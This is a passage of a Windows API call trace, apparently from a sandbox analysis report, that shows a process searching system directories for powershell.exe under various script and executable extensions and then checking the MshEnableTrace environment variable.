	[0350.706] SetErrorMode (uMode=0x1) returned 0x1
	[0350.707] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.707] SetErrorMode (uMode=0x1) returned 0x1
	[0350.707] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.707] SetErrorMode (uMode=0x1) returned 0x1
	[0350.707] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.708] SetErrorMode (uMode=0x1) returned 0x1
	[0350.708] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.708] SetErrorMode (uMode=0x1) returned 0x1
	[0350.708] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.708] SetErrorMode (uMode=0x1) returned 0x1
	[0350.708] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.709] SetErrorMode (uMode=0x1) returned 0x1
	[0350.709] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.709] SetErrorMode (uMode=0x1) returned 0x1
	[0350.709] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.709] SetErrorMode (uMode=0x1) returned 0x1
	[0350.709] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.709] SetErrorMode (uMode=0x1) returned 0x1
	[0350.710] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.710] SetErrorMode (uMode=0x1) returned 0x1
	[0350.710] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.710] SetErrorMode (uMode=0x1) returned 0x1
	[0350.710] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0350.710] SetErrorMode (uMode=0x1) returned 0x1
	[0350.710] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.711] SetErrorMode (uMode=0x1) returned 0x1
	[0350.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.711] SetErrorMode (uMode=0x1) returned 0x1
	[0350.711] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.711] SetErrorMode (uMode=0x1) returned 0x1
	[0350.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.712] SetErrorMode (uMode=0x1) returned 0x1
	[0350.712] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.712] SetErrorMode (uMode=0x1) returned 0x1
	[0350.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.712] SetErrorMode (uMode=0x1) returned 0x1
	[0350.712] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.712] SetErrorMode (uMode=0x1) returned 0x1
	[0350.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.713] SetErrorMode (uMode=0x1) returned 0x1
	[0350.713] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.713] SetErrorMode (uMode=0x1) returned 0x1
	[0350.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.713] SetErrorMode (uMode=0x1) returned 0x1
	[0350.713] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.714] SetErrorMode (uMode=0x1) returned 0x1
	[0350.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.714] SetErrorMode (uMode=0x1) returned 0x1
	[0350.714] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.714] SetErrorMode (uMode=0x1) returned 0x1
	[0350.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.715] SetErrorMode (uMode=0x1) returned 0x1
	[0350.715] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.715] SetErrorMode (uMode=0x1) returned 0x1
	[0350.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.715] SetErrorMode (uMode=0x1) returned 0x1
	[0350.715] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.715] SetErrorMode (uMode=0x1) returned 0x1
	[0350.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.716] SetErrorMode (uMode=0x1) returned 0x1
	[0350.716] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.716] SetErrorMode (uMode=0x1) returned 0x1
	[0350.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.716] SetErrorMode (uMode=0x1) returned 0x1
	[0350.716] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.717] SetErrorMode (uMode=0x1) returned 0x1
	[0350.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.717] SetErrorMode (uMode=0x1) returned 0x1
	[0350.717] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.717] SetErrorMode (uMode=0x1) returned 0x1
	[0350.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.718] SetErrorMode (uMode=0x1) returned 0x1
	[0350.718] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.718] SetErrorMode (uMode=0x1) returned 0x1
	[0350.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.718] SetErrorMode (uMode=0x1) returned 0x1
	[0350.718] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.718] SetErrorMode (uMode=0x1) returned 0x1
	[0350.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.719] SetErrorMode (uMode=0x1) returned 0x1
	[0350.719] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.719] SetErrorMode (uMode=0x1) returned 0x1
	[0350.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0350.719] SetErrorMode (uMode=0x1) returned 0x1
	[0350.719] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.720] SetErrorMode (uMode=0x1) returned 0x1
	[0350.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0350.720] SetErrorMode (uMode=0x1) returned 0x1
	[0350.720] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.720] SetErrorMode (uMode=0x1) returned 0x1
	[0350.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0350.721] SetErrorMode (uMode=0x1) returned 0x1
	[0350.721] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.721] SetErrorMode (uMode=0x1) returned 0x1
	[0350.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0350.721] SetErrorMode (uMode=0x1) returned 0x1
	[0350.721] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.721] SetErrorMode (uMode=0x1) returned 0x1
	[0350.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0350.722] SetErrorMode (uMode=0x1) returned 0x1
	[0350.722] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.722] SetErrorMode (uMode=0x1) returned 0x1
	[0350.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0350.723] SetErrorMode (uMode=0x1) returned 0x1
	[0350.723] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b8e8cb0
	[0350.724] FindNextFileW (in: hFindFile=0x1b8e8cb0, lpFindFileData=0x1c92dff0 | out: lpFindFileData=0x1c92dff0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0350.724] FindClose (in: hFindFile=0x1b8e8cb0 | out: hFindFile=0x1b8e8cb0) returned 1
	[0350.724] SetErrorMode (uMode=0x1) returned 0x1
	[0350.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c92e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0350.725] SetErrorMode (uMode=0x1) returned 0x1
	[0350.725] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c92e310 | out: lpFileInformation=0x1c92e310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0350.725] SetErrorMode (uMode=0x1) returned 0x1
	[0350.726] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0350.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.726] CoTaskMemFree (pv=0x100430) 
	[0350.728] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0350.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.728] CoTaskMemFree (pv=0x100430) 
	[0350.731] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0350.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.731] CoTaskMemFree (pv=0x100430) 
	[0351.067] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0351.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
